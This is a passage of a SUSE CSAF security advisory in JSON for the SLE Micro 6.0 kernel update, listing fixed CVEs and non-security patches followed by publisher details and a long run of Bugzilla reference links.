in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- Disable CONFIG_CPU5_WDT The cpu5wdt driver doesn\u0027t implement a\n proper watchdog interface and has many code issues. It only handles\n obscure and obsolete hardware. Stop building and supporting this driver\n (jsc#PED-14062).\n- Update config files (jsc#PED-12554 jsc#PED-6996\n bsc#1243677 ltc#213602 bsc#1243678 ltc#213596)\n CONFIG_IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY=y\n CONFIG_INTEGRITY_CA_MACHINE_KEYRING_MAX=y\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- cifs: Fix copy offload to flush destination region (bsc#1252511).\n- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).\n- cifs: Fix uncached read into ITER_KVEC iterator (bsc#1245449).\n- cifs: make cifs_chan_update_iface() a void function (git-fixes).\n- cifs: update dstaddr whenever channel iface is updated (git-fixes).\n- cpuidle: menu: Use residency threshold in polling state override decisions (bsc#1255026).\n- dm: fix queue start/stop imbalance under suspend/load/resume races (bsc#1253386)\n- drm/amdgpu: update mappings not managed by KFD (bsc#1255428)\n- ext4: use optimized mballoc scanning regardless of inode format (bsc#1254378).\n- ext4: wait for ongoing I/O to complete before freeing blocks (bsc#1256366).\n- fs: dlm: allow to F_SETLKW getting interrupted (bsc#1255025).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- media: atomisp: Prefix firmware paths with \"intel/ipu/\" (bsc#1252973).\n- media: atomisp: Remove firmware_name module parameter (bsc#1252973).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: usb: pegasus: fix memory leak in update_eth_regs_async() (git-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event\n handling (bsc#1253262 ltc#216029).\n- powerpc/kexec: Enable SMT before waking offline CPUs (bsc#1214285\n bsc#1205462 ltc#200161 ltc#200588 git-fixes bsc#1253739 ltc#211493\n bsc#1254244 ltc#216496).\n- sched: Increase sched_tick_remote timeout (bsc#1254510).\n- scsi: lpfc: Add capability to register Platform Name ID to fabric (bsc#1254119).\n- scsi: lpfc: Allow support for BB credit recovery in point-to-point topology (bsc#1254119).\n- scsi: lpfc: Ensure unregistration of rpis for received PLOGIs (bsc#1254119).\n- scsi: lpfc: Fix leaked ndlp krefs when in point-to-point topology (bsc#1254119).\n- scsi: lpfc: Fix reusing an ndlp that is marked NLP_DROPPED during FLOGI (bsc#1254119).\n- scsi: lpfc: Modify kref handling for Fabric Controller ndlps (bsc#1254119).\n- scsi: lpfc: Remove redundant NULL ptr assignment in lpfc_els_free_iocb() (bsc#1254119).\n- scsi: lpfc: Revise discovery related function headers and comments (bsc#1254119).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).\n- scsi: lpfc: Update lpfc version to 14.4.0.12 (bsc#1254119).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).\n- scsi: lpfc: Update various NPIV diagnostic log messaging (bsc#1254119).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- soc/tegra: fuse: speedo-tegra210: Update speedo IDs (git-fixes).\n- spi: tegra210-quad: Check hardware status on timeout (bsc#1253155)\n- spi: tegra210-quad: Fix timeout handling (bsc#1253155)\n- spi: tegra210-quad: Refactor error handling into helper functions (bsc#1253155)\n- spi: tegra210-quad: Update dummy sequence configuration (git-fixes)\n- supported.conf: Mark lan 743x supported (jsc#PED-14571)\n- tracing: Fix access to trace_event_file (bsc#1254373).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).\n- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).\n- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).\n- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).\n- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).\n- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any\n unreleased standalone Zen5 microcode patches (bsc#1256528).\n- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).\n- x86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value (bsc#1256528).\n- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).\n- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).\n- x86/microcode/AMD: Select which microcode patch to load (bsc#1256528).\n- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).\n- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.0-kernel-281",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20477-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20477-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620477-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20477-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024409.html"
},
{
"category": "self",
"summary": "SUSE Bug 1012628",
"url": "https://bugzilla.suse.com/1012628"
},
{
"category": "self",
"summary": "SUSE Bug 1065729",
"url": "https://bugzilla.suse.com/1065729"
},
{
"category": "self",
"summary": "SUSE Bug 1194869",
"url": "https://bugzilla.suse.com/1194869"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1214635",
"url": "https://bugzilla.suse.com/1214635"
},
{
"category": "self",
"summary": "SUSE Bug 1214847",
"url": "https://bugzilla.suse.com/1214847"
},
{
"category": "self",
"summary": "SUSE Bug 1215146",
"url": "https://bugzilla.suse.com/1215146"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1215211",
"url": "https://bugzilla.suse.com/1215211"
},
{
"category": "self",
"summary": "SUSE Bug 1215344",
"url": "https://bugzilla.suse.com/1215344"
},
{
"category": "self",
"summary": "SUSE Bug 1216062",
"url": "https://bugzilla.suse.com/1216062"
},
{
"category": "self",
"summary": "SUSE Bug 1216436",
"url": "https://bugzilla.suse.com/1216436"
},
{
"category": "self",
"summary": "SUSE Bug 1219165",
"url": "https://bugzilla.suse.com/1219165"
},
{
"category": "self",
"summary": "SUSE Bug 1220419",
"url": "https://bugzilla.suse.com/1220419"
},
{
"category": "self",
"summary": "SUSE Bug 1223731",
"url": "https://bugzilla.suse.com/1223731"
},
{
"category": "self",
"summary": "SUSE Bug 1223800",
"url": "https://bugzilla.suse.com/1223800"
},
{
"category": "self",
"summary": "SUSE Bug 1228490",
"url": "https://bugzilla.suse.com/1228490"
},
{
"category": "self",
"summary": "SUSE Bug 1233563",
"url": "https://bugzilla.suse.com/1233563"
},
{
"category": "self",
"summary": "SUSE Bug 1234163",
"url": "https://bugzilla.suse.com/1234163"
},
{
"category": "self",
"summary": "SUSE Bug 1234842",
"url": "https://bugzilla.suse.com/1234842"
},
{
"category": "self",
"summary": "SUSE Bug 1241437",
"url": "https://bugzilla.suse.com/1241437"
},
{
"category": "self",
"summary": "SUSE Bug 1242909",
"url": "https://bugzilla.suse.com/1242909"
},
{
"category": "self",
"summary": "SUSE Bug 1243677",
"url": "https://bugzilla.suse.com/1243677"
},
{
"category": "self",
"summary": "SUSE Bug 1243678",
"url": "https://bugzilla.suse.com/1243678"
},
{
"category": "self",
"summary": "SUSE Bug 1245193",
"url": "https://bugzilla.suse.com/1245193"
},
{
"category": "self",
"summary": "SUSE Bug 1245449",
"url": "https://bugzilla.suse.com/1245449"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246328",
"url": "https://bugzilla.suse.com/1246328"
},
{
"category": "self",
"summary": "SUSE Bug 1246447",
"url": "https://bugzilla.suse.com/1246447"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247500",
"url": "https://bugzilla.suse.com/1247500"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248886",
"url": "https://bugzilla.suse.com/1248886"
},
{
"category": "self",
"summary": "SUSE Bug 1249256",
"url": "https://bugzilla.suse.com/1249256"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250334",
"url": "https://bugzilla.suse.com/1250334"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252046",
"url": "https://bugzilla.suse.com/1252046"
},
{
"category": "self",
"summary": "SUSE Bug 1252342",
"url": "https://bugzilla.suse.com/1252342"
},
{
"category": "self",
"summary": "SUSE Bug 1252511",
"url": "https://bugzilla.suse.com/1252511"
},
{
"category": "self",
"summary": "SUSE Bug 1252686",
"url": "https://bugzilla.suse.com/1252686"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252776",
"url": "https://bugzilla.suse.com/1252776"
},
{
"category": "self",
"summary": "SUSE Bug 1252808",
"url": "https://bugzilla.suse.com/1252808"
},
{
"category": "self",
"summary": "SUSE Bug 1252824",
"url": "https://bugzilla.suse.com/1252824"
},
{
"category": "self",
"summary": "SUSE Bug 1252861",
"url": "https://bugzilla.suse.com/1252861"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1252919",
"url": "https://bugzilla.suse.com/1252919"
},
{
"category": "self",
"summary": "SUSE Bug 1252973",
"url": "https://bugzilla.suse.com/1252973"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253155",
"url": "https://bugzilla.suse.com/1253155"
},
{
"category": "self",
"summary": "SUSE Bug 1253262",
"url": "https://bugzilla.suse.com/1253262"
},
{
"category": "self",
"summary": "SUSE Bug 1253342",
"url": "https://bugzilla.suse.com/1253342"
},
{
"category": "self",
"summary": "SUSE Bug 1253365",
"url": "https://bugzilla.suse.com/1253365"
},
{
"category": "self",
"summary": "SUSE Bug 1253386",
"url": "https://bugzilla.suse.com/1253386"
},
{
"category": "self",
"summary": "SUSE Bug 1253400",
"url": "https://bugzilla.suse.com/1253400"
},
{
"category": "self",
"summary": "SUSE Bug 1253402",
"url": "https://bugzilla.suse.com/1253402"
},
{
"category": "self",
"summary": "SUSE Bug 1253408",
"url": "https://bugzilla.suse.com/1253408"
},
{
"category": "self",
"summary": "SUSE Bug 1253413",
"url": "https://bugzilla.suse.com/1253413"
},
{
"category": "self",
"summary": "SUSE Bug 1253442",
"url": "https://bugzilla.suse.com/1253442"
},
{
"category": "self",
"summary": "SUSE Bug 1253451",
"url": "https://bugzilla.suse.com/1253451"
},
{
"category": "self",
"summary": "SUSE Bug 1253458",
"url": "https://bugzilla.suse.com/1253458"
},
{
"category": "self",
"summary": "SUSE Bug 1253463",
"url": "https://bugzilla.suse.com/1253463"
},
{
"category": "self",
"summary": "SUSE Bug 1253623",
"url": "https://bugzilla.suse.com/1253623"
},
{
"category": "self",
"summary": "SUSE Bug 1253647",
"url": "https://bugzilla.suse.com/1253647"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254119",
"url": "https://bugzilla.suse.com/1254119"
},
{
"category": "self",
"summary": "SUSE Bug 1254126",
"url": "https://bugzilla.suse.com/1254126"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254373",
"url": "https://bugzilla.suse.com/1254373"
},
{
"category": "self",
"summary": "SUSE Bug 1254378",
"url": "https://bugzilla.suse.com/1254378"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254465",
"url": "https://bugzilla.suse.com/1254465"
},
{
"category": "self",
"summary": "SUSE Bug 1254510",
"url": "https://bugzilla.suse.com/1254510"
},
{
"category": "self",
"summary": "SUSE Bug 1254518",
"url": "https://bugzilla.suse.com/1254518"
},
{
"category": "self",
"summary": "SUSE Bug 1254520",
"url": "https://bugzilla.suse.com/1254520"
},
{
"category": "self",
"summary": "SUSE Bug 1254599",
"url": "https://bugzilla.suse.com/1254599"
},
{
"category": "self",
"summary": "SUSE Bug 1254606",
"url": "https://bugzilla.suse.com/1254606"
},
{
"category": "self",
"summary": "SUSE Bug 1254611",
"url": "https://bugzilla.suse.com/1254611"
},
{
"category": "self",
"summary": "SUSE Bug 1254613",
"url": "https://bugzilla.suse.com/1254613"
},
{
"category": "self",
"summary": "SUSE Bug 1254615",
"url": "https://bugzilla.suse.com/1254615"
},
{
"category": "self",
"summary": "SUSE Bug 1254621",
"url": "https://bugzilla.suse.com/1254621"
},
{
"category": "self",
"summary": "SUSE Bug 1254623",
"url": "https://bugzilla.suse.com/1254623"
},
{
"category": "self",
"summary": "SUSE Bug 1254624",
"url": "https://bugzilla.suse.com/1254624"
},
{
"category": "self",
"summary": "SUSE Bug 1254626",
"url": "https://bugzilla.suse.com/1254626"
},
{
"category": "self",
"summary": "SUSE Bug 1254648",
"url": "https://bugzilla.suse.com/1254648"
},
{
"category": "self",
"summary": "SUSE Bug 1254649",
"url": "https://bugzilla.suse.com/1254649"
},
{
"category": "self",
"summary": "SUSE Bug 1254653",
"url": "https://bugzilla.suse.com/1254653"
},
{
"category": "self",
"summary": "SUSE Bug 1254655",
"url": "https://bugzilla.suse.com/1254655"
},
{
"category": "self",
"summary": "SUSE Bug 1254657",
"url": "https://bugzilla.suse.com/1254657"
},
{
"category": "self",
"summary": "SUSE Bug 1254660",
"url": "https://bugzilla.suse.com/1254660"
},
{
"category": "self",
"summary": "SUSE Bug 1254661",
"url": "https://bugzilla.suse.com/1254661"
},
{
"category": "self",
"summary": "SUSE Bug 1254663",
"url": "https://bugzilla.suse.com/1254663"
},
{
"category": "self",
"summary": "SUSE Bug 1254669",
"url": "https://bugzilla.suse.com/1254669"
},
{
"category": "self",
"summary": "SUSE Bug 1254677",
"url": "https://bugzilla.suse.com/1254677"
},
{
"category": "self",
"summary": "SUSE Bug 1254678",
"url": "https://bugzilla.suse.com/1254678"
},
{
"category": "self",
"summary": "SUSE Bug 1254688",
"url": "https://bugzilla.suse.com/1254688"
},
{
"category": "self",
"summary": "SUSE Bug 1254690",
"url": "https://bugzilla.suse.com/1254690"
},
{
"category": "self",
"summary": "SUSE Bug 1254691",
"url": "https://bugzilla.suse.com/1254691"
},
{
"category": "self",
"summary": "SUSE Bug 1254693",
"url": "https://bugzilla.suse.com/1254693"
},
{
"category": "self",
"summary": "SUSE Bug 1254695",
"url": "https://bugzilla.suse.com/1254695"
},
{
"category": "self",
"summary": "SUSE Bug 1254698",
"url": "https://bugzilla.suse.com/1254698"
},
{
"category": "self",
"summary": "SUSE Bug 1254701",
"url": "https://bugzilla.suse.com/1254701"
},
{
"category": "self",
"summary": "SUSE Bug 1254704",
"url": "https://bugzilla.suse.com/1254704"
},
{
"category": "self",
"summary": "SUSE Bug 1254705",
"url": "https://bugzilla.suse.com/1254705"
},
{
"category": "self",
"summary": "SUSE Bug 1254707",
"url": "https://bugzilla.suse.com/1254707"
},
{
"category": "self",
"summary": "SUSE Bug 1254712",
"url": "https://bugzilla.suse.com/1254712"
},
{
"category": "self",
"summary": "SUSE Bug 1254715",
"url": "https://bugzilla.suse.com/1254715"
},
{
"category": "self",
"summary": "SUSE Bug 1254717",
"url": "https://bugzilla.suse.com/1254717"
},
{
"category": "self",
"summary": "SUSE Bug 1254723",
"url": "https://bugzilla.suse.com/1254723"
},
{
"category": "self",
"summary": "SUSE Bug 1254724",
"url": "https://bugzilla.suse.com/1254724"
},
{
"category": "self",
"summary": "SUSE Bug 1254732",
"url": "https://bugzilla.suse.com/1254732"
},
{
"category": "self",
"summary": "SUSE Bug 1254733",
"url": "https://bugzilla.suse.com/1254733"
},
{
"category": "self",
"summary": "SUSE Bug 1254737",
"url": "https://bugzilla.suse.com/1254737"
},
{
"category": "self",
"summary": "SUSE Bug 1254739",
"url": "https://bugzilla.suse.com/1254739"
},
{
"category": "self",
"summary": "SUSE Bug 1254742",
"url": "https://bugzilla.suse.com/1254742"
},
{
"category": "self",
"summary": "SUSE Bug 1254743",
"url": "https://bugzilla.suse.com/1254743"
},
{
"category": "self",
"summary": "SUSE Bug 1254749",
"url": "https://bugzilla.suse.com/1254749"
},
{
"category": "self",
"summary": "SUSE Bug 1254750",
"url": "https://bugzilla.suse.com/1254750"
},
{
"category": "self",
"summary": "SUSE Bug 1254753",
"url": "https://bugzilla.suse.com/1254753"
},
{
"category": "self",
"summary": "SUSE Bug 1254754",
"url": "https://bugzilla.suse.com/1254754"
},
{
"category": "self",
"summary": "SUSE Bug 1254758",
"url": "https://bugzilla.suse.com/1254758"
},
{
"category": "self",
"summary": "SUSE Bug 1254761",
"url": "https://bugzilla.suse.com/1254761"
},
{
"category": "self",
"summary": "SUSE Bug 1254762",
"url": "https://bugzilla.suse.com/1254762"
},
{
"category": "self",
"summary": "SUSE Bug 1254765",
"url": "https://bugzilla.suse.com/1254765"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1254782",
"url": "https://bugzilla.suse.com/1254782"
},
{
"category": "self",
"summary": "SUSE Bug 1254791",
"url": "https://bugzilla.suse.com/1254791"
},
{
"category": "self",
"summary": "SUSE Bug 1254793",
"url": "https://bugzilla.suse.com/1254793"
},
{
"category": "self",
"summary": "SUSE Bug 1254794",
"url": "https://bugzilla.suse.com/1254794"
},
{
"category": "self",
"summary": "SUSE Bug 1254795",
"url": "https://bugzilla.suse.com/1254795"
},
{
"category": "self",
"summary": "SUSE Bug 1254796",
"url": "https://bugzilla.suse.com/1254796"
},
{
"category": "self",
"summary": "SUSE Bug 1254797",
"url": "https://bugzilla.suse.com/1254797"
},
{
"category": "self",
"summary": "SUSE Bug 1254798",
"url": "https://bugzilla.suse.com/1254798"
},
{
"category": "self",
"summary": "SUSE Bug 1254813",
"url": "https://bugzilla.suse.com/1254813"
},
{
"category": "self",
"summary": "SUSE Bug 1254815",
"url": "https://bugzilla.suse.com/1254815"
},
{
"category": "self",
"summary": "SUSE Bug 1254825",
"url": "https://bugzilla.suse.com/1254825"
},
{
"category": "self",
"summary": "SUSE Bug 1254828",
"url": "https://bugzilla.suse.com/1254828"
},
{
"category": "self",
"summary": "SUSE Bug 1254829",
"url": "https://bugzilla.suse.com/1254829"
},
{
"category": "self",
"summary": "SUSE Bug 1254830",
"url": "https://bugzilla.suse.com/1254830"
},
{
"category": "self",
"summary": "SUSE Bug 1254832",
"url": "https://bugzilla.suse.com/1254832"
},
{
"category": "self",
"summary": "SUSE Bug 1254835",
"url": "https://bugzilla.suse.com/1254835"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254840",
"url": "https://bugzilla.suse.com/1254840"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254843",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254846",
"url": "https://bugzilla.suse.com/1254846"
},
{
"category": "self",
"summary": "SUSE Bug 1254847",
"url": "https://bugzilla.suse.com/1254847"
},
{
"category": "self",
"summary": "SUSE Bug 1254849",
"url": "https://bugzilla.suse.com/1254849"
},
{
"category": "self",
"summary": "SUSE Bug 1254850",
"url": "https://bugzilla.suse.com/1254850"
},
{
"category": "self",
"summary": "SUSE Bug 1254851",
"url": "https://bugzilla.suse.com/1254851"
},
{
"category": "self",
"summary": "SUSE Bug 1254852",
"url": "https://bugzilla.suse.com/1254852"
},
{
"category": "self",
"summary": "SUSE Bug 1254854",
"url": "https://bugzilla.suse.com/1254854"
},
{
"category": "self",
"summary": "SUSE Bug 1254856",
"url": "https://bugzilla.suse.com/1254856"
},
{
"category": "self",
"summary": "SUSE Bug 1254858",
"url": "https://bugzilla.suse.com/1254858"
},
{
"category": "self",
"summary": "SUSE Bug 1254860",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "self",
"summary": "SUSE Bug 1254864",
"url": "https://bugzilla.suse.com/1254864"
},
{
"category": "self",
"summary": "SUSE Bug 1254869",
"url": "https://bugzilla.suse.com/1254869"
},
{
"category": "self",
"summary": "SUSE Bug 1254871",
"url": "https://bugzilla.suse.com/1254871"
},
{
"category": "self",
"summary": "SUSE Bug 1254894",
"url": "https://bugzilla.suse.com/1254894"
},
{
"category": "self",
"summary": "SUSE Bug 1254918",
"url": "https://bugzilla.suse.com/1254918"
},
{
"category": "self",
"summary": "SUSE Bug 1254957",
"url": "https://bugzilla.suse.com/1254957"
},
{
"category": "self",
"summary": "SUSE Bug 1254959",
"url": "https://bugzilla.suse.com/1254959"
},
{
"category": "self",
"summary": "SUSE Bug 1254983",
"url": "https://bugzilla.suse.com/1254983"
},
{
"category": "self",
"summary": "SUSE Bug 1255005",
"url": "https://bugzilla.suse.com/1255005"
},
{
"category": "self",
"summary": "SUSE Bug 1255009",
"url": "https://bugzilla.suse.com/1255009"
},
{
"category": "self",
"summary": "SUSE Bug 1255025",
"url": "https://bugzilla.suse.com/1255025"
},
{
"category": "self",
"summary": "SUSE Bug 1255026",
"url": "https://bugzilla.suse.com/1255026"
},
{
"category": "self",
"summary": "SUSE Bug 1255030",
"url": "https://bugzilla.suse.com/1255030"
},
{
"category": "self",
"summary": "SUSE Bug 1255033",
"url": "https://bugzilla.suse.com/1255033"
},
{
"category": "self",
"summary": "SUSE Bug 1255034",
"url": "https://bugzilla.suse.com/1255034"
},
{
"category": "self",
"summary": "SUSE Bug 1255035",
"url": "https://bugzilla.suse.com/1255035"
},
{
"category": "self",
"summary": "SUSE Bug 1255039",
"url": "https://bugzilla.suse.com/1255039"
},
{
"category": "self",
"summary": "SUSE Bug 1255041",
"url": "https://bugzilla.suse.com/1255041"
},
{
"category": "self",
"summary": "SUSE Bug 1255042",
"url": "https://bugzilla.suse.com/1255042"
},
{
"category": "self",
"summary": "SUSE Bug 1255046",
"url": "https://bugzilla.suse.com/1255046"
},
{
"category": "self",
"summary": "SUSE Bug 1255057",
"url": "https://bugzilla.suse.com/1255057"
},
{
"category": "self",
"summary": "SUSE Bug 1255062",
"url": "https://bugzilla.suse.com/1255062"
},
{
"category": "self",
"summary": "SUSE Bug 1255064",
"url": "https://bugzilla.suse.com/1255064"
},
{
"category": "self",
"summary": "SUSE Bug 1255065",
"url": "https://bugzilla.suse.com/1255065"
},
{
"category": "self",
"summary": "SUSE Bug 1255068",
"url": "https://bugzilla.suse.com/1255068"
},
{
"category": "self",
"summary": "SUSE Bug 1255072",
"url": "https://bugzilla.suse.com/1255072"
},
{
"category": "self",
"summary": "SUSE Bug 1255075",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "self",
